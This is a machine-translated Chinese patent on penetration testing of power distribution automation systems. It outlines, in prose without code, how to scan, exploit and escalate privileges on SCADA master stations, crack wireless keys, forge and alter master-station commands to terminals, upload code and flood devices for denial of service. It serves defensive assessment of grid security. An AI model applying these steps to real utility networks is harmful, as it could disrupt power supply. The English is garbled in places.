CN104468267B - A kind of electrical power distribution automatization system information security penetration testing method - Google Patents
A kind of electrical power distribution automatization system information security penetration testing method Download PDFInfo
- Publication number
- CN104468267B CN104468267B CN201410680264.6A CN201410680264A CN104468267B CN 104468267 B CN104468267 B CN 104468267B CN 201410680264 A CN201410680264 A CN 201410680264A CN 104468267 B CN104468267 B CN 104468267B
- Authority
- CN
- China
- Prior art keywords
- penetration testing
- network
- information
- test
- testing
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000012360 testing method Methods 0.000 title claims abstract description 225
- 230000035515 penetration Effects 0.000 title claims abstract description 133
- 230000006854 communication Effects 0.000 claims abstract description 31
- 238000004891 communication Methods 0.000 claims abstract description 30
- 238000000034 method Methods 0.000 claims abstract description 24
- 238000005516 engineering process Methods 0.000 claims abstract description 18
- 238000004458 analytical method Methods 0.000 claims abstract description 8
- 238000012423 maintenance Methods 0.000 claims abstract description 6
- 230000007812 deficiency Effects 0.000 claims abstract description 5
- 230000005540 biological transmission Effects 0.000 claims description 30
- 238000001514 detection method Methods 0.000 claims description 13
- 230000008859 change Effects 0.000 claims description 12
- 238000010998 test method Methods 0.000 claims description 8
- 230000004044 response Effects 0.000 claims description 5
- 238000004519 manufacturing process Methods 0.000 claims description 4
- 230000004083 survival effect Effects 0.000 claims description 4
- 238000010200 validation analysis Methods 0.000 claims description 3
- RTZKZFJDLAIYFH-UHFFFAOYSA-N Diethyl ether Chemical compound CCOCC RTZKZFJDLAIYFH-UHFFFAOYSA-N 0.000 claims 2
- 230000008595 infiltration Effects 0.000 claims 1
- 238000001764 infiltration Methods 0.000 claims 1
- 238000005259 measurement Methods 0.000 abstract description 3
- 238000012502 risk assessment Methods 0.000 abstract description 3
- 230000006855 networking Effects 0.000 abstract description 2
- 238000002955 isolation Methods 0.000 description 3
- 230000003139 buffering effect Effects 0.000 description 2
- 238000013461 design Methods 0.000 description 2
- 230000004048 modification Effects 0.000 description 2
- 238000012986 modification Methods 0.000 description 2
- 239000012466 permeate Substances 0.000 description 2
- 230000008569 process Effects 0.000 description 2
- 238000011160 research Methods 0.000 description 2
- 241000700605 Viruses Species 0.000 description 1
- 230000008901 benefit Effects 0.000 description 1
- 235000000332 black box Nutrition 0.000 description 1
- 235000013399 edible fruits Nutrition 0.000 description 1
- 230000005611 electricity Effects 0.000 description 1
- 239000000686 essence Substances 0.000 description 1
- 239000000835 fiber Substances 0.000 description 1
- 230000006872 improvement Effects 0.000 description 1
- 238000007689 inspection Methods 0.000 description 1
- 230000003993 interaction Effects 0.000 description 1
- 230000009545 invasion Effects 0.000 description 1
- 238000011835 investigation Methods 0.000 description 1
- 230000007246 mechanism Effects 0.000 description 1
- 238000009738 saturating Methods 0.000 description 1
- 238000004088 simulation Methods 0.000 description 1
- 238000013522 software testing Methods 0.000 description 1
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The invention discloses a kind of electrical power distribution automatization system information security penetration testing method,To main station system,Distribution network terminal,Communication port carries out penetration testing,Make full use of information system fragility penetration testing technology,Pass through the attack method of analog hacker,To assess electrical power distribution automatization system security,Including to main station system,Communication line,Any weakness of distribution terminal,The active analysis of technological deficiency or leak,The security risk analysis work that this method can be used for before electrical power distribution automatization system networking,To that potential safety hazard manufacturer completes rectification and repetition measurement work provides guidance be present,This method is with strong points,Test scope is wide,It can greatly shorten the testing time compared to traditional penetration test mode,Reduce after equipment is reached the standard grade because safety problem failure carries out the generation of offline maintenance event,Not only meet electrical power distribution automatization system Information Security Risk penetration testing,Industrial control system in radiation-curable industry and outside industry simultaneously.
Description
Technical field
The invention belongs to industrial control system Information Security Risk analysis technical field, more particularly to a kind of power distribution automation
System information safety penetration testing method.
Background technology
Under the promotion of informationization, industrial control system and conventional information seem safely two incoherent industries and generated
It has been occured simultaneously that, especially since " shake net " event, industrial control system information security causes the great attention of various countries.Industrial control system
It is related to various important infrastructures, is related to national economy, its importance is self-evident.For a long time, industrial control system
It is considered as a relatively professional, enclosed information island, remains comparatively safe state.But as industry is controlled in recent years
The fast network of system processed, interconnected, various industrial infrastructures, including power industry, one after another by virus or even hacker
Invasion, people start to examine the safety of industrial control system closely again.
However, only focusing on reliability and real-time at the beginning of due to Design Scheme of Industrial Control System, information security is ignored for a long time,
And the information security technology means such as popular intrusion detection, fire wall and leak reparation are asked due to compatibility in conventional systems
Topic, it is difficult to be disposed in industry control network with not being altered, causes leak existing for system and hidden danger to be difficult to effectively be protected.Work
The long-standing risk hidden danger of control system has become an important factor for influence national basis facility stable operation.
Electrical power distribution automatization system, with the important industrial control system of electricity consumption link, has typicalness and representative as power network
Property.Its potential risk faced mainly has:
1) main station system risk:Because main station system server OS version is too low or security strategy configuration imperfection
Main website operating system is caused numerous security breaches to be present.
2) communication line risk:As low and medium voltage distribution network is fast-developing, some do not possess low in fiber optic communication condition
Press-fitting power network employs public network communication mode transmission control instruction, the risk for causing systems face to be attacked from public network.
3) distribution terminal risk:Distribution terminal substantial amounts, type are various, and terminal system is mostly vxworks, linux
Deng early version embedded system, existence information leakage, illegal access, controlled risk.
Therefore, it is necessary to by carrying out the Information Security Risk penetration testing technical research work for electrical power distribution automatization system
Make, the leak discovery technique and attack meanses used by full simulation hacker as much as possible, to electrical power distribution automatization system safety
Property deeply detect, fragile link present in discovery system, ensure electrical power distribution automatization system safe and stable operation.
The content of the invention
It is not strong it is an object of the invention to overcome existing penetration testing method to test specific aim for electrical power distribution automatization system
The shortcomings that, information system fragility penetration testing technology is made full use of, by the attack method of analog hacker, to assess distribution certainly
Dynamicization security of system, including the master to main station system, communication line, any weakness of distribution terminal, technological deficiency or leak
A kind of dynamic analysis, there is provided reasonable in design, quickly and accurately electrical power distribution automatization system information security hidden danger penetration testing method.
It is an object of the invention to provide a kind of electrical power distribution automatization system information security penetration testing method, the distribution are automatic
Changing system information safety penetration testing method includes:
Step 1, penetration testing is carried out to main station system;
Step 2, penetration testing is carried out to distribution network terminal;
Step 3, penetration testing is carried out to communication port.
Further, in step 1, the concrete methods of realizing that penetration testing is carried out to main station system is:
Test scope delimited, SCADA servers, FES servers, WEB server delimited to the model for target network environment
Enclose, it is determined that test content, method of testing, test condition, test target;
Using various public resources, the information for being related to test target is obtained;
Position network state, operating system and the Relative Network framework of target;
The port of all openings in goal systems is found out, the service currently run is enumerated by open port;
By commonly using individual mailbox, the high background information of telephone number, conventional user account, reliability, be fabricated to
More meaningful weak passwurd dictionary, carry out weak passwurd scanning;
Leak is found by combining automatically and manually two kinds of different method of testings;
Using leak, goal systems is permeated by existing vulnerability exploit program;
Tester lifts the authority of oneself using the local leak of suitable current system environment, obtains power user's power
Limit or system-level authority.
Further, various public resources, when acquisition is related to the information of test target, the information on test target are utilized
It can be collected from internet, related data can be obtained from various search engines, it is possible to use professional instrument maintenance data is dug
Pick technology collects useful information;
The port of all openings in goal systems is found out, can during by open port to enumerate the service currently run
By using a series of opening status of Port Scanning Technologies detection port, Port Scanning Technology includes standard-sized sheet (full-open)
Scanning, half-open (half-open) scanning, hidden (stealth) scanning;
If do not find weak passwurd, then can position and divide based on the open port and service routine that have been found that
Leak present in goal systems is analysed, the instrument that the work specifically tested can give Hole Detection is completed;
Using leak, during by existing vulnerability exploit program to permeate goal systems, tester can leak client
Hole is combined using program and social engineering, carrys out control targe system;
Tester lifts the authority of oneself using the local leak of suitable current system environment, obtains power user's power
Limit or during system-level authority, tester can also further attack home network system, according to the target zone defined before,
This kind of attack can be restricted or unrestricted, by sniff network packet, crack the close of various services
Code, use data forgery attack in the home network, it would be possible to which acquisition is more on by the information of control system, putting forward power most
Whole purpose is to obtain the highest access rights of goal systems.
Further, in step 2, the concrete methods of realizing that penetration testing is carried out to distribution network terminal is:
Information search is tested, and penetration testing engineer inquires keeper's bus structures, protocol type, assets important level letter
Breath, network sweep is carried out using specialized protocol addressing software, understand survival terminal and terminal address in industry control network, carry out letter
Breath collects test;
Gathering system leak, penetration testing engineer is in www.us-cert.gov/control_systems/ics-
Cert/ American industries control system Information Security Incident Response group website, www.scadahacker.com industry controls are safety-related
Professional forum search newest vulnerability information, special programing system leak;
Vulnerability scanning, penetration testing engineer are leaked by using such as NESSUS SCADA plug-in units to the next machine equipment
Hole is scanned, and finds known bugs and the leak order of severity;
Firmware leak is collected, penetration testing engineer inquires about it in the security bulletin by the next machine equipment production firm and set
Standby vulnerability information and latest firmware version, by contrasting whether the next machine equipment has upgraded renewal to newest firmware in time
Version determines the presence of leak;
Vulnerability exploit is tested, and penetration testing engineer writes slave computer vulnerability exploit journey using instruments such as METASPOLOIT
Sequence or vulnerability exploit program is collected in the safety-related professional forum of industry control, test and validation is carried out to the seriousness of leak;
Code tester is downloaded, penetration testing engineer understands terminal by special programming software or order debugging software and set
Standby facilities, such as whether allowing source code to download, whether allowing compiled code to download, whether be encrypted to code, be
The no information such as can remotely read;
Upload code is tested, and penetration testing engineer utilizes programing system software or life using the engineer station forged
Debugging software is made to carry out firmware upgrade or code update to terminal, testing whether being capable of the new code of successful execution;
Slave computer instruction testing, penetration testing engineering using the ingress-only packet sniffing software such as SNIFFER capture data link layer,
Internet, transport layer, application layer net obtain terminal transmission data, and packet content and transmission are checked using specialized protocol analyzer
Address and destination address, its data is changed, is resend, check whether substation receives and perform;
Host computer instruction testing, penetration testing engineering using the ingress-only packet sniffing software such as SNIFFER capture data link layer,
Internet, transport layer, application layer net obtain host computer transmission data, and command content and transmission are checked using specialized protocol analyzer
Address and raw address, the instruction of its main website is changed, forge instruction of the host computer to slave computer, check whether substation receives and perform;
Refuse service testing, penetration testing engineer by sending substantial amounts of broadcasting packet, delay by the data for filling slave station
Area is rushed, slave station can not be normally received the data of main website transmission.
Further, it is in step 3, the concrete methods of realizing that penetration testing is carried out to communication port:
Network test is connected, penetration testing engineer uses Wired access mode, by industrial switch by testing tool
Access industrial Control System NetWork or using wireless access way, by searching wireless network signal, access industrial control system
System network;
Wireless network strength is tested, penetration testing engineer by the wireless crack tool such as BT, to WEP, WPA, WPA2,
AES, DES are cracked, and obtain encryption key, and then with legal identity access industrial Control System NetWork;
The test of network equipment leak is collected, penetration testing engineer is by checking the network equipment, such as consolidating for industrial switch
Part, check whether as latest edition, and searched by the safety-related professional forum of www.scadahacker.com industry controls newest
Vulnerability information;
Network equipment detection is controlled, penetration testing engineer attempts to log in by using the mode of weak passwurd and Brute Force
Keeper's account, by obtaining administrator right, the configuration information of the network equipment can be modified;Such as change port information,
Network segment isolation information, device address etc., reach and interrupt session, pretend to be main website etc. to test;
Message test is monitored, penetration testing engineering uses the ingress-only packet sniffing softwares such as SNIFFER capture data link layer, net
Network layers, transport layer, application layer net obtain terminal transmission data, check packet content using specialized protocol analyzer and send ground
Location and destination address;
Change message test, penetration testing engineering can analyze the packet of acquisition, change its packet transmission address,
Destination address, data content, then again send packet,
Refuse service testing, penetration testing engineer by sending substantial amounts of broadcasting packet, delay by the data for filling slave station
Area is rushed, slave station can not be normally received the data of main website transmission, or restarts the network equipment, BlueDrama is interrupted, causes net
Network refusal service.
Further, the electrical power distribution automatization system information security penetration testing method is used for main station system, communication port, distribution
The penetration testing of terminal, the main station system are communicated to connect by the communication port and the distribution network terminal, and the communication is logical
Road includes Ethernet, GPRS, and the distribution network terminal includes distribution network terminal DTU, distribution network terminal FTU, distribution network terminal DTU/FTU.
Electrical power distribution automatization system information security penetration testing method provided by the invention, electrical power distribution automatization system information peace
Full penetration testing method carries out penetration testing to main station system, distribution network terminal, communication port.Wherein, the test and appraisal pin of main station system
Known software leak class is tested and assessed, mainly swept using Black-box Testing technology using SCADA hole scanners, Loopholes of OS
Retouch instrument, database hole scanner and application system hole scanner and carry out safety detection;The test and appraisal side of communication protocol
Method is the communication message interaction for comparing details, is reported using Software Testing Tool simulant-client and server end
Text transmitting-receiving response, and message accounting analysis tool auxiliary.Electrical power distribution automatization system mainly uses IEC60870-5-101, and 104
Stipulations, IEC60870-5-101, the function of 104 standards realize should there is uniformity, and test content includes:The inspection of configuration parameter
Test, the checking of communication process, test case foundation DL/T 634.56, IEC60870-5-601, IEC60870-5-604 standards
Related content;Terminal penetration testing technology mainly include to terminal hardware layer, system layer, software layer, communication layers it is any weak
The active analysis of point, technological deficiency or leak, this analysis are carried out from an attacker position that may be present, and
Had ready conditions from this position and actively utilize security breaches.The security risk point that the present invention can be used for before electrical power distribution automatization system networking
Work is analysed, it is with strong points, test scope is wide to that potential safety hazard manufacturer completes rectification and repetition measurement work provides guidance be present,
It can greatly shorten the testing time compared to traditional penetration test mode, reduce after equipment is reached the standard grade because safety problem failure carries out offline dimension
The generation of event is repaiied, not only meets electrical power distribution automatization system Information Security Risk penetration testing, while also in radiation-curable industry
With industrial control system outside industry, avoid occurring to cause power distribution station massive blackout event by information security attack, be National Industrial
Control system security assurance information provides important support.
Brief description of the drawings
Fig. 1 is the implementation process of electrical power distribution automatization system information security penetration testing method provided in an embodiment of the present invention
Figure;
Fig. 2 is the targeted distribution of electrical power distribution automatization system information security penetration testing method provided in an embodiment of the present invention
Automated system simplifies the structural representation of abstract model;
Fig. 3 is the concrete methods of realizing flow chart that main station system provided in an embodiment of the present invention carries out penetration testing.
Embodiment
In order to make the purpose , technical scheme and advantage of the present invention be clearer, it is right below in conjunction with drawings and Examples
The present invention is described in further detail.It should be appreciated that the specific embodiments described herein are merely illustrative of the present invention,
It is not used to limit invention.
Fig. 1 shows the realization stream of electrical power distribution automatization system information security penetration testing method provided in an embodiment of the present invention
Journey.
The electrical power distribution automatization system information security penetration testing method includes:
Step S101, penetration testing is carried out to main station system;
Step S102, penetration testing is carried out to distribution network terminal;
Step S103, penetration testing is carried out to communication port.
In embodiments of the present invention, in step S101, the concrete methods of realizing that penetration testing is carried out to main station system is:
Test scope delimited, SCADA servers, FES servers, WEB server delimited to the model for target network environment
Enclose, it is determined that test content, method of testing, test condition, test target;
Using various public resources, the information for being related to test target is obtained;
Position network state, operating system and the Relative Network framework of target;
The port of all openings in goal systems is found out, the service currently run is enumerated by open port;
By commonly using individual mailbox, the high background information of telephone number, conventional user account, reliability, be fabricated to
More meaningful weak passwurd dictionary, carry out weak passwurd scanning;
Leak is found by combining automatically and manually two kinds of different method of testings;
Using leak, goal systems is permeated by existing vulnerability exploit program;
Tester lifts the authority of oneself using the local leak of suitable current system environment, obtains power user's power
Limit or system-level authority.
As shown in figure 3, main station system carries out the concrete methods of realizing flow chart of penetration testing;
In embodiments of the present invention, using various public resources, when acquisition is related to the information of test target, on test
The information of target can be collected from internet, can obtain related data from various search engines, it is possible to use professional instrument
Maintenance data digging technology collects useful information;
The port of all openings in goal systems is found out, can during by open port to enumerate the service currently run
By using a series of opening status of Port Scanning Technologies detection port, Port Scanning Technology includes standard-sized sheet (full-open)
Scanning, half-open (half-open) scanning, hidden (stealth) scanning;
If do not find weak passwurd, then can position and divide based on the open port and service routine that have been found that
Leak present in goal systems is analysed, the instrument that the work specifically tested can give Hole Detection is completed;
Using leak, during by existing vulnerability exploit program to permeate goal systems, tester can leak client
Hole is combined using program and social engineering, carrys out control targe system;
Tester lifts the authority of oneself using the local leak of suitable current system environment, obtains power user's power
Limit or during system-level authority, tester can also further attack home network system, according to the target zone defined before,
This kind of attack can be restricted or unrestricted, by sniff network packet, crack the close of various services
Code, use data forgery attack in the home network, it would be possible to which acquisition is more on by the information of control system, putting forward power most
Whole purpose is to obtain the highest access rights of goal systems.
In embodiments of the present invention, in step s 102, it is to the concrete methods of realizing of distribution network terminal progress penetration testing:
Information search is tested, and penetration testing engineer inquires keeper's bus structures, protocol type, assets important level letter
Breath, network sweep is carried out using specialized protocol addressing software, understand survival terminal and terminal address in industry control network, carry out letter
Breath collects test;
Gathering system leak, penetration testing engineer is in www.us-cert.gov/control_systems/ics-
Cert/ American industries control system Information Security Incident Response group website, www.scadahacker.com industry controls are safety-related
Professional forum search newest vulnerability information, special programing system leak;
Vulnerability scanning, penetration testing engineer are leaked by using such as NESSUS SCADA plug-in units to the next machine equipment
Hole is scanned, and finds known bugs and the leak order of severity;
Firmware leak is collected, penetration testing engineer inquires about it in the security bulletin by the next machine equipment production firm and set
Standby vulnerability information and latest firmware version, by contrasting whether the next machine equipment has upgraded renewal to newest firmware in time
Version determines the presence of leak;
Vulnerability exploit is tested, and penetration testing engineer writes slave computer vulnerability exploit journey using instruments such as METASPOLOIT
Sequence or vulnerability exploit program is collected in the safety-related professional forum of industry control, test and validation is carried out to the seriousness of leak;
Code tester is downloaded, penetration testing engineer understands terminal by special programming software or order debugging software and set
Standby facilities, such as whether allowing source code to download, whether allowing compiled code to download, whether be encrypted to code, be
The no information such as can remotely read;
Upload code is tested, and penetration testing engineer utilizes programing system software or life using the engineer station forged
Debugging software is made to carry out firmware upgrade or code update to terminal, testing whether being capable of the new code of successful execution;
Slave computer instruction testing, penetration testing engineering using the ingress-only packet sniffing software such as SNIFFER capture data link layer,
Internet, transport layer, application layer net obtain terminal transmission data, and packet content and transmission are checked using specialized protocol analyzer
Address and destination address, its data is changed, is resend, check whether substation receives and perform;
Host computer instruction testing, penetration testing engineering using the ingress-only packet sniffing software such as SNIFFER capture data link layer,
Internet, transport layer, application layer net obtain host computer transmission data, and command content and transmission are checked using specialized protocol analyzer
Address and raw address, the instruction of its main website is changed, forge instruction of the host computer to slave computer, check whether substation receives and perform;
Refuse service testing, penetration testing engineer by sending substantial amounts of broadcasting packet, delay by the data for filling slave station
Area is rushed, slave station can not be normally received the data of main website transmission.
In embodiments of the present invention, it is in step S103, the concrete methods of realizing that penetration testing is carried out to communication port:
Network test is connected, penetration testing engineer uses Wired access mode, by industrial switch by testing tool
Access industrial Control System NetWork or using wireless access way, by searching wireless network signal, access industrial control system
System network;
Wireless network strength is tested, penetration testing engineer by the wireless crack tool such as BT, to WEP, WPA, WPA2,
AES, DES are cracked, and obtain encryption key, and then with legal identity access industrial Control System NetWork;
The test of network equipment leak is collected, penetration testing engineer is by checking the network equipment, such as consolidating for industrial switch
Part, check whether as latest edition, and searched by the safety-related professional forum of www.scadahacker.com industry controls newest
Vulnerability information;
Network equipment detection is controlled, penetration testing engineer attempts to log in by using the mode of weak passwurd and Brute Force
Keeper's account, by obtaining administrator right, the configuration information of the network equipment can be modified;Such as change port information,
Network segment isolation information, device address etc., reach and interrupt session, pretend to be main website etc. to test;
Message test is monitored, penetration testing engineering uses the ingress-only packet sniffing softwares such as SNIFFER capture data link layer, net
Network layers, transport layer, application layer net obtain terminal transmission data, check packet content using specialized protocol analyzer and send ground
Location and destination address;
Change message test, penetration testing engineering can analyze the packet of acquisition, change its packet transmission address,
Destination address, data content, then again send packet,
Refuse service testing, penetration testing engineer by sending substantial amounts of broadcasting packet, delay by the data for filling slave station
Area is rushed, slave station can not be normally received the data of main website transmission, or restarts the network equipment, BlueDrama is interrupted, causes net
Network refusal service.
Further, the electrical power distribution automatization system information security penetration testing method is used for main station system, communication port, distribution
The penetration testing of terminal, the main station system are communicated to connect by the communication port and the distribution network terminal, and the communication is logical
Road includes Ethernet, GPRS, and the distribution network terminal includes distribution network terminal DTU, distribution network terminal FTU, distribution network terminal DTU/FTU.
Below in conjunction with the accompanying drawings and specific embodiment is further described to the application principle of the present invention.
As shown in Fig. 2 electrical power distribution automatization system information security hidden danger penetration testing method provided by the invention mainly for
Main station system, communication port (Ethernet, GPRS etc.), distribution network terminal (DTU, FTU etc.) three parts.
Main station system penetration testing:
1) target zone delimited.Before distribution main website penetration testing is started, it should first observe and understand given target
The scope of network environment, specifically include SCADA servers, FES servers, WEB server.The stage delimited in target zone, needed
It is defined as follows outline:What is tested, it how is tested, needs to use which type of condition, test implementation in test process
During have which limitation, need how long could complete to test, need which type of business objective reached.
2) information.After test scope delimited, it is necessary into information investigation stage.In this stage, ooze
Saturating tester needs to use various public resources, to obtain more information for being related to test target.These information can be from
Collected on internet, related data can be obtained from various search engines, the instrument maintenance data of specialty can also be used
Digging technology collects useful information, and the information being collected into is more, and the successful probability of penetration testing is higher.
3) target detection.The main task in this stage is to position network state, operating system and the Relative Network of target
Framework.The equipment that the stage will intactly show the currently used technology of objective network and connection, these information can help
Tester further enumerates the various services run in objective network.
4) target is enumerated.This stage can be further using the achievement in above each stage, and find out institute in goal systems
There is open port.Once it have found all open ports, it is possible to enumerate the service currently run by these ports.It is logical
Cross using a series of Port Scanning Technologies, such as standard-sized sheet (full-open) scanning, half-open (half-open) scanning, hidden
(stealth) scanning etc., the opening status of port can be detected, even if destination host is in fire wall or intruding detection system
Protection under it is no exception.By the way that the port opened on main frame is corresponded into corresponding service routine, can help further to send out
Dig leak that may be present in objective network infrastructure.Therefore, the stage is to find that various networks are set in test afterwards
Standby leak lays the foundation, and these leaks are all likely to result in serious harm.
5) weak passwurd scans.Enough multi information can divergent thinking are grasped.In current internet faith mechanisms
When mainly in the form of user and password to ensure, password just becomes the weakness of people.Sorted out with reference to social engineering
The information related to test target, such as the individual mailbox that keeper is commonly used, telephone number, commonly use user account, reliability
High background information etc..These information are fabricated to more meaningful weak passwurd dictionary.Combine social engineering and make
Dictionary can exhaustion work become more meaningful.
6) leak is found.If do not find weak passwurd, then can be based on the open port and service journey having been found that
Sequence, to position and analyze leak present in goal systems.The instrument that the work specifically tested can give Hole Detection is completed.
These tasks can certainly be accomplished manually, the huge time can be spent by simply so doing, and need the knowledge of expert's level.But
It is that, by combining automatically and manually both different method of testings, tester can be made to have a clearly understanding, and energy
Enough carefully to test any known and unknown leak, otherwise these leaks will be always present in objective network system.
7) vulnerability exploit.After the leak in going through and finding goal systems, it is possible to pass through existing leak
Goal systems is permeated using program.Sometimes in order to allow existing vulnerability exploit program can normal work, it is necessary to it
Carry out extra research and modification.This sounds a little difficult, but if we use an advanced vulnerability exploit instrument
, will be simply many to complete this work.In addition, tester can be by client vulnerability exploit program and social engineering
It is combined, carrys out control targe system.This stage focuses mainly on how taking down goal systems.
8) privilege-escalation.Once controlling goal systems, permeable work has just successfully completed.Next, tester is just
It can act on one's own in systems, this degrees of freedom depends on the access rights that he is possessed.Tester can also use
Some are adapted to the local leaks of current system environment to lift the authority of oneself, and these put forward power vulnerability exploit program once successfully holding
OK, it is possible to obtain superuser right or system-level authority.As point of penetration, tester can also further attack
Home network system.According to the target zone defined before, this kind of attack can be restricted or unrestricted.
By sniff network packet, crack the password of various services, use data forgery attack in the home network, it would be possible to obtaining
Obtain more on by the information of control system.Therefore, the final purpose for putting forward power is to obtain the highest access rights of goal systems.
Distribution network terminal penetration testing:
1) information search is tested.Penetration testing engineer inquires keeper's bus structures, protocol type, assets important level
Information, network sweep is carried out using specialized protocol addressing software, understand survival terminal and terminal address in industry control network.
2) gathering system leak.Penetration testing engineer can be in www.us-cert.gov/control_systems/
Ics-cert/ American industries control system Information Security Incident Response group website, www.scadahacker.com industry controls safety
Newest vulnerability information, special programing system leak etc. is searched by related professional forum.
3) vulnerability scanning.Penetration testing engineer is carried out by using such as NESSUS SCADA plug-in units to the next machine equipment
Vulnerability scanning, find known bugs and the leak order of severity.
4) firmware leak is collected.Penetration testing engineer inquires about it in the security bulletin by the next machine equipment production firm
The vulnerability information and latest firmware version of equipment, renewal whether is upgraded in time by contrasting the next machine equipment and has consolidated to newest
Part version determines the presence of leak.
5) vulnerability exploit is tested.Penetration testing engineer writes slave computer vulnerability exploit using instruments such as METASPOLOIT
Program or vulnerability exploit program is collected in the safety-related professional forum of industry control, the seriousness of leak is tested and tested
Card.
6) code tester is downloaded.Penetration testing engineer understands terminal by special programming software or order debugging software
The facilities of equipment, such as whether allow source code download, whether allow compiled code download, whether code be encrypted,
The information such as whether can remotely read.
7) upload code is tested.Penetration testing engineer using the engineer station forged, using programing system software or
Order debugging software carries out firmware upgrade or code update to terminal, and testing whether being capable of the new code of successful execution.
8) slave computer instruction testing.Penetration testing engineering uses the ingress-only packet sniffing softwares such as SNIFFER capture data link
Layer, Internet, transport layer, application layer net obtain terminal transmission data, using specialized protocol analyzer check packet content and
Address and destination address are sent, its data is changed, resends, check whether substation receives and perform.
9) host computer instruction testing.Penetration testing engineering uses the ingress-only packet sniffing softwares such as SNIFFER capture data link
Layer, Internet, transport layer, application layer net obtain host computer transmission data, using specialized protocol analyzer check command content and
Address and raw address are sent, changes the instruction of its main website, instruction of the host computer to slave computer is forged, checks whether substation receives and hold
OK.
10) service testing is refused.Penetration testing engineer fills the data of slave station by sending substantial amounts of broadcasting packet
Buffering area, slave station can not be normally received the data of main website transmission.
Communication port penetration testing:
1) network test is connected:Penetration testing engineer uses Wired access mode, and work will be tested by industrial switch
Has access industrial Control System NetWork or using wireless access way, by searching wireless network signal, access industrial control
Grid.
2) wireless network strength is tested:Penetration testing engineer by the wireless crack tool such as BT, to WEP, WPA, WPA2,
AES, DES are cracked, and obtain encryption key, and then with legal identity access industrial Control System NetWork.
3) test of network equipment leak is collected:Penetration testing engineer is by checking the network equipment, such as industrial switch
Firmware, check whether as latest edition, and searched most by the safety-related professional forum of www.scadahacker.com industry controls
New vulnerability information.
4) network equipment detection is controlled:Penetration testing engineer attempts to step on by using the mode of weak passwurd and Brute Force
Land keeper's account, by obtaining administrator right, the configuration information of the network equipment can be modified.Such as change port letter
Breath, network segment isolation information, device address etc., reach and interrupt session, pretend to be main website etc. to test.
5) message test is monitored:Penetration testing engineering using the ingress-only packet sniffing software such as SNIFFER capture data link layer,
Internet, transport layer, application layer net obtain terminal transmission data, and packet content and transmission are checked using specialized protocol analyzer
Address and destination address.
6) message test is changed:Penetration testing engineering can analyze the packet of acquisition, with changing the transmission of its packet
Location, destination address, data content, then again send packet,
7) service testing is refused:Penetration testing engineer fills the data of slave station by sending substantial amounts of broadcasting packet
Buffering area, slave station can not be normally received the data of main website transmission, or restart the network equipment, interrupt BlueDrama, cause
Network refusal service.
Electrical power distribution automatization system information security penetration testing method provided in an embodiment of the present invention, the electrical power distribution automatization system
Information security penetration testing method carries out penetration testing to main station system, distribution network terminal, communication port, makes full use of information system
Fragility penetration testing technology, including:The collection of electric automation system information, port scan, password guess, long-range spilling, local
Spilling, script test and privilege-escalation etc., there is corresponding professional gimmick in each stage and using instrument, to ensure that test is tied
Fruit it is comprehensive and accurate;By the attack method of analog hacker, to assess electrical power distribution automatization system security, including to system of main website
System, communication line, any weakness of distribution terminal, the active analysis of technological deficiency or leak, this method can be used for distribution automatic
Security risk analysis before change system networks works, to that potential safety hazard manufacturer completes rectification and repetition measurement work offer refers to be present
Lead, this method is with strong points, test scope is wide, can greatly shorten the testing time compared to traditional penetration test mode, reduces equipment
Because safety problem failure carries out the generation of offline maintenance event after reaching the standard grade, this method not only meets electrical power distribution automatization system information
Security risk penetration testing, while also in radiation-curable industry with the outer industrial control system of industry, avoid occurring to pass through information security attack
Cause power distribution station massive blackout event, important support is provided for National Industrial control system security assurance information.
The foregoing is merely illustrative of the preferred embodiments of the present invention, is not intended to limit the invention, all essences in the present invention
All any modification, equivalent and improvement made within refreshing and principle etc., should be included in the scope of the protection.
Claims (1)
- A kind of 1. electrical power distribution automatization system information security penetration testing method, it is characterised in that the electrical power distribution automatization system information Safe penetration method of testing utilizes information system fragility penetration testing technology, including:Electric automation system information is collected, port Scanning, password guess, long-range spilling, local spilling, script test and privilege-escalation, by the attack method of analog hacker, come Assess electrical power distribution automatization system security, including to main station system, communication line, distribution terminal any weakness, technological deficiency Or the active analysis of leak, specifically include:Step 1, penetration testing is carried out to main station system;Step 2, penetration testing is carried out to distribution network terminal;Step 3, penetration testing is carried out to communication port;In step 1, the concrete methods of realizing that penetration testing is carried out to main station system is:Test scope delimited, SCADA servers, FES servers, WEB server delimited into the scope for target network environment, really Location survey examination content, method of testing, test condition, test target;Using various public resources, the information for being related to test target is obtained;Position network state, operating system and the Relative Network framework of target;The port of all openings in goal systems is found out, the service currently run is enumerated by open port;By the high background information of individual mailbox, telephone number, conventional user account, reliability, it is fabricated to more meaningful weak mouth Dictionary is made, carries out weak passwurd scanning;Leak is found by combining automatically and manually two kinds of different method of testings;Using leak, goal systems is permeated by existing vulnerability exploit program;Tester lifts the authority of oneself using the local leak of current system environment, obtains superuser right or is Irrespective of size authority;Using various public resources, when acquisition is related to the information of test target, the information on test target is from internet Collect, related data is obtained from various search engines or collects useful letter using the instrument maintenance data digging technology of specialty Breath;In step 2, the concrete methods of realizing that penetration testing is carried out to distribution network terminal is:Information search is tested, and penetration testing engineer inquires keeper's bus structures, protocol type, assets important level information, Network sweep is carried out using specialized protocol addressing software, survival terminal and terminal address in industry control network is understood, enters row information Collect test;Gathering system leak, penetration testing engineer are beautiful in www.us-cert.gov/control_systems/ics-cert/ The safety-related specialty of industrial control system Information Security Incident Response group of state website, www.scadahacker.com industry controls Newest vulnerability information, special programing system leak are searched by forum;Vulnerability scanning, penetration testing engineer carry out vulnerability scanning to the next machine equipment by using plug-in unit, find known bugs And the leak order of severity;Firmware leak is collected, the leakage of query facility in the security bulletin that penetration testing engineer passes through the next machine equipment production firm Hole information and latest firmware version, by contrast the next machine equipment whether upgraded in time renewal to newest firmware version come Determine the presence of leak;Vulnerability exploit is tested, and penetration testing engineer writes slave computer vulnerability exploit program using METASPOLOIT instruments, to leakage The seriousness in hole carries out test and validation;Code tester is downloaded, penetration testing engineer understands terminal device by special programming software or order debugging software Facilities, such as whether allowing source code to download, whether allowing compiled code to download, whether be encrypted, whether can to code Enough long-range reading information;Upload code is tested, and penetration testing engineer is adjusted using the engineer station forged using programing system software or order Try software and firmware upgrade or code update are carried out to terminal, testing whether being capable of the new code of successful execution;Slave computer instruction testing, penetration testing engineering use SNIFFER ingress-only packet sniffings software capture data link layer, network Layer, transport layer, application layer net obtain terminal transmission data, check packet content using protocol analyzer and send address and mesh Address, change its data, resend, check whether substation receives and perform;Host computer instruction testing, penetration testing engineering use 